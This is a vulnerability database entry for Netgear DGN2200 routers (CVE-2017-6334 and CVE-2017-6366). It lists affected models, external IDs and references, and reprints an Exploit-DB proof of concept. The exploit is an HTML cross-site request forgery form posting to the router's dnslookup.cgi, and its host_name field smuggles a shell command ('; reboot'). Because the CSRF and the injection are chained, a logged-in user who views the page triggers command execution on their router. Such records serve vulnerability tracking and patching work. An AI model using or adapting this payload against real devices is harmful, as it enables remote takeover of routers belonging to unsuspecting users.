ID
VAR-E-201702-0147
CVE
cve_id: | CVE-2017-6334 | Trust: 2.3 |
cve_id: | CVE-2017-6366 | Trust: 1.0 |
EDB ID
41472
TITLE
Netgear DGN2200v1/v2/v3/v4 - Cross-Site Request Forgery - Hardware webapps Exploit
Trust: 0.6
DESCRIPTION
Netgear DGN2200v1/v2/v3/v4 - Cross-Site Request Forgery. CVE-2017-6334, CVE-2017-6366. Webapps exploit for Hardware platform.
Trust: 0.6
AFFECTED PRODUCTS
vendor: | netgear | model: | dgn2200v1/v2/v3/v4 | scope: | - | version: | - | Trust: 1.6 |
vendor: | netgear | model: | dgn2200 dnslookup.cgi | scope: | - | version: | - | Trust: 0.5 |
vendor: | netgear | model: | dgn2201 dnslookup.cgi remote | scope: | eq | version: | v1/v2/v3/v4 | Trust: 0.5 |
vendor: | netgear | model: | dgn2200v4 | scope: | eq | version: | 0 | Trust: 0.3 |
vendor: | netgear | model: | dgn2200v3 | scope: | eq | version: | 0 | Trust: 0.3 |
vendor: | netgear | model: | dgn2200v2 | scope: | eq | version: | 0 | Trust: 0.3 |
vendor: | netgear | model: | dgn2200v1 | scope: | eq | version: | 0 | Trust: 0.3 |
EXPLOIT
# Exploit Title: NETGEAR Firmware DGN2200v1/v2/v3/v4 CSRF which leads to RCE through CVE-2017-6334
# Date: 2017-02-28
# Exploit Author: SivertPL
# Vendor Homepage: http://netgear.com/
# Software Link: http://www.downloads.netgear.com/files/GDC/DGN2200/DGN2200%20Firmware%20Version%201.0.0.20%20-%20Initial%20Release%20(NA).zip
# Version: 10.0.0.20 (initial) - 10.0.0.50 (latest, still 0-day!)
# Tested on: DGN2200v1,v2,v3,v4
# CVE: CVE-2017-6366
A quite dangerous CSRF was discovered on all DGN2200 firmwares.
When chained with either CVE-2017-6077 or CVE-2017-6334, it allows for unauthenticated (sic!) RCE after tricking somebody logged in to the router into viewing a website.
<!DOCTYPE html>
<html>
<title>netgear router CSRF</title>
<body>
<form method="POST" action="http://192.168.0.1/dnslookup.cgi">
<input type="hidden" name="host_name" value="www.google.com; reboot"> <!-- CVE-2017-6334 payload -->
<input type="hidden" name="lookup" value="Lookup">
<button name="clc" value="clc">Would You Dare To?</button>
</form>
</body>
</html>
<!-- 2017-02-27 by SivertPL -->
Trust: 1.0
EXPLOIT LANGUAGE
html
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Cross-Site Request Forgery
Trust: 1.6
TAGS
tag: | exploit | Trust: 1.0 |
tag: | remote | Trust: 0.5 |
tag: | cgi | Trust: 0.5 |
CREDITS
SivertPL
Trust: 0.6
EXTERNAL IDS
db: | NVD | id: | CVE-2017-6334 | Trust: 2.3 |
db: | EXPLOIT-DB | id: | 41472 | Trust: 1.6 |
db: | NVD | id: | CVE-2017-6366 | Trust: 1.0 |
db: | EDBNET | id: | 91672 | Trust: 0.6 |
db: | PACKETSTORM | id: | 143128 | Trust: 0.5 |
db: | PACKETSTORM | id: | 141337 | Trust: 0.5 |
db: | BID | id: | 96463 | Trust: 0.3 |
REFERENCES
url: | https://nvd.nist.gov/vuln/detail/cve-2017-6334 | Trust: 2.0 |
url: | https://nvd.nist.gov/vuln/detail/cve-2017-6366 | Trust: 1.0 |
url: | https://www.exploit-db.com/exploits/41472/ | Trust: 0.6 |
url: | http://www.netgear.com | Trust: 0.3 |
SOURCES
db: | BID | id: | 96463 |
db: | PACKETSTORM | id: | 143128 |
db: | PACKETSTORM | id: | 141337 |
db: | EXPLOIT-DB | id: | 41472 |
db: | EDBNET | id: | 91672 |
LAST UPDATE DATE
2022-07-27T09:11:33.421000+00:00
SOURCES UPDATE DATE
db: | BID | id: | 96463 | date: | 2017-03-07T01:08:00 |
SOURCES RELEASE DATE
db: | BID | id: | 96463 | date: | 2017-02-26T00:00:00 |
db: | PACKETSTORM | id: | 143128 | date: | 2017-06-24T17:45:41 |
db: | PACKETSTORM | id: | 141337 | date: | 2017-02-26T05:55:55 |
db: | EXPLOIT-DB | id: | 41472 | date: | 2017-02-28T00:00:00 |
db: | EDBNET | id: | 91672 | date: | 2017-02-28T00:00:00 |